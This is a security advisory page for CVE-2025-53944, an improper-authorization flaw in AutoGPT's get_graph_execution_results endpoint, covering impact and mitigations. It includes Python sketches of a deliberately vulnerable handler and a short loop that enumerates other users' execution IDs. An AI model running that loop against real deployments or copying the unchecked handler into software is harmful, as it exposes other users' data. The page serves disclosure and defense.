
CVE-2025-53944: CWE-285: Improper Authorization in Significant-Gravitas AutoGPT

Severity: High
Tags: Vulnerability, CVE-2025-53944, CWE-285
Published: Wed Jul 30 2025 (07/30/2025, 14:28:36 UTC)
Source: CVE Database V5
Vendor/Project: Significant-Gravitas
Product: AutoGPT

Description

AutoGPT is a platform that allows users to create, deploy, and manage continuous artificial intelligence agents. In v0.6.15 and below, the external API's get_graph_execution_results endpoint has an authorization bypass vulnerability. While it correctly validates user access to the graph_id, it fails to verify ownership of the graph_exec_id parameter, allowing authenticated users to access any execution results by providing arbitrary execution IDs. The internal API implements proper validation for both parameters. This is fixed in v0.6.16.
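As a minimal sketch of the gap described above, the snippet below contrasts a handler that trusts graph_exec_id with one that also confirms the execution belongs to the authorized graph. The data model, function shapes, and IDs are illustrative assumptions, not AutoGPT's actual code.

```python
# Toy in-memory stores; in AutoGPT these would be database lookups.
GRAPHS = {
    "graph-1": {"owner": "alice"},
    "graph-2": {"owner": "mallory"},
}
EXECUTIONS = {
    # Execution results belonging to alice's graph.
    "exec-99": {"graph_id": "graph-1", "results": ["alice's confidential output"]},
}


def get_graph_execution_results_vulnerable(user: str, graph_id: str, graph_exec_id: str):
    """Mirrors the flawed check: graph_id is validated, graph_exec_id is not."""
    graph = GRAPHS.get(graph_id)
    if graph is None or graph["owner"] != user:
        raise PermissionError("not authorized for this graph")
    # graph_exec_id is trusted as-is, so any authenticated user who owns *some*
    # graph can read any execution's results by supplying arbitrary IDs.
    return EXECUTIONS[graph_exec_id]["results"]


def get_graph_execution_results_fixed(user: str, graph_id: str, graph_exec_id: str):
    """Mirrors the fix: the execution must belong to the authorized graph."""
    graph = GRAPHS.get(graph_id)
    if graph is None or graph["owner"] != user:
        raise PermissionError("not authorized for this graph")
    execution = EXECUTIONS.get(graph_exec_id)
    if execution is None or execution["graph_id"] != graph_id:
        raise PermissionError("execution does not belong to this graph")
    return execution["results"]
```

With this toy data, get_graph_execution_results_vulnerable("mallory", "graph-2", "exec-99") returns results from alice's graph, while get_graph_execution_results_fixed rejects the same call with PermissionError.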

AI-Powered Analysis

AI analysis last updated: 07/30/2025, 15:02:43 UTC

Technical Analysis

CVE-2025-53944 is a high-severity authorization bypass vulnerability affecting Significant-Gravitas AutoGPT versions prior to 0.6.16. AutoGPT is a platform for creating, deploying, and managing continuous AI agents, which rely on graph-based execution workflows. The vulnerability lies in the external API endpoint get_graph_execution_results, which returns execution results for a given graph. The endpoint correctly validates the caller's access to the graph_id parameter but does not verify ownership of, or authorization for, the graph_exec_id parameter. As a result, any authenticated user can supply arbitrary execution IDs and retrieve execution results belonging to other users, bypassing the intended access controls. The internal API enforces validation on both parameters; the external API's missing check constitutes a CWE-285 (Improper Authorization) weakness. Exploitation requires no user interaction and can be carried out remotely over the network with low complexity, although the attacker must be authenticated (PR:L). The CVSS 3.1 base score of 7.7 reflects high confidentiality impact from unauthorized data disclosure, no impact on integrity or availability, and a scope change, since the vulnerability exposes resources beyond the attacker's privileges. The issue is fixed in AutoGPT version 0.6.16. No exploits are known in the wild as of the publication date.
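To illustrate the exploitation pattern implied by the vector (network access, low privileges, no user interaction), the hedged sketch below shows an authenticated caller iterating over candidate execution IDs. The base URL, endpoint path, and authentication header are assumptions for illustration only and do not reflect AutoGPT's documented external API routes.

```python
import requests

BASE_URL = "https://autogpt.example.com/external-api"   # hypothetical deployment
API_KEY = "attacker-owned-but-valid-key"                # attacker is authenticated (PR:L)
OWN_GRAPH_ID = "graph-owned-by-attacker"                # passes the graph_id check

# Guessed or leaked execution IDs belonging to other users.
candidate_exec_ids = ["exec-0001", "exec-0002", "exec-0003"]

for exec_id in candidate_exec_ids:
    resp = requests.get(
        f"{BASE_URL}/graphs/{OWN_GRAPH_ID}/executions/{exec_id}/results",
        headers={"Authorization": f"Bearer {API_KEY}"},
        timeout=10,
    )
    if resp.status_code == 200:
        # On vulnerable versions (<= 0.6.15) this can return another user's
        # execution results; on 0.6.16+ the ownership check rejects the request.
        print(exec_id, resp.json())
```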

Potential Impact

For European organizations using AutoGPT, especially those leveraging AI agents for sensitive or proprietary workflows, this vulnerability poses a significant risk to confidentiality. Unauthorized access to execution results could expose sensitive AI decision-making data, intellectual property, or personal data processed by the AI agents, which could in turn lead to data breaches, regulatory non-compliance (e.g., GDPR violations), and loss of competitive advantage. Because the vulnerability does not affect integrity or availability, operational disruption is unlikely, but the exposure of confidential information alone can have severe reputational and financial consequences. Organizations in sectors such as finance, healthcare, research, and government that adopt AutoGPT for AI automation are particularly at risk. The authentication requirement limits exploitation to legitimate users or compromised accounts, but insider threats and credential theft keep such scenarios plausible. The scope change indicates that attackers can access data beyond their authorized domain, increasing the severity of a breach.

Mitigation Recommendations

European organizations should immediately upgrade AutoGPT to version 0.6.16 or later to remediate this vulnerability. Until patching is possible, organizations should restrict access to the external API endpoints to trusted networks and users, implement strict monitoring and logging of API calls to detect anomalous access patterns, and enforce strong authentication and authorization controls, including multi-factor authentication to reduce the risk of credential compromise. Additionally, organizations should conduct audits of existing execution results access logs to identify potential unauthorized access. Network segmentation and API gateway policies can be employed to limit exposure of the vulnerable endpoint. Developers should review custom integrations with AutoGPT to ensure they do not bypass internal API protections. Finally, organizations should incorporate this vulnerability into their incident response plans and ensure staff are aware of the risk and remediation steps.
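As a starting point for the log-audit recommendation above, the following hedged sketch flags requests in which the requesting user does not own the execution whose results were fetched. The log format, column names, and ownership mapping are assumptions and would need to be adapted to an actual deployment's API logs and data store.

```python
import csv

# Hypothetical mapping from execution ID to its owning user, exported from the database.
EXECUTION_OWNERS = {"exec-99": "alice", "exec-42": "bob"}


def find_suspicious_accesses(log_path: str):
    """Yield log rows where a user fetched results for an execution they do not own."""
    with open(log_path, newline="") as f:
        # Expected columns (assumed): timestamp, user, endpoint, graph_exec_id
        for row in csv.DictReader(f):
            if row["endpoint"] != "get_graph_execution_results":
                continue
            owner = EXECUTION_OWNERS.get(row["graph_exec_id"])
            if owner is not None and owner != row["user"]:
                yield row


if __name__ == "__main__":
    for hit in find_suspicious_accesses("api_access_log.csv"):
        print("possible unauthorized access:", hit)
```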


Technical Details

Data Version: 5.1
Assigner Short Name: GitHub_M
Date Reserved: 2025-07-14T17:23:35.262Z
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 688a3097ad5a09ad00a852b6

Added to database: 7/30/2025, 2:47:51 PM

Last enriched: 7/30/2025, 3:02:43 PM

Last updated: 7/31/2025, 5:31:30 AM
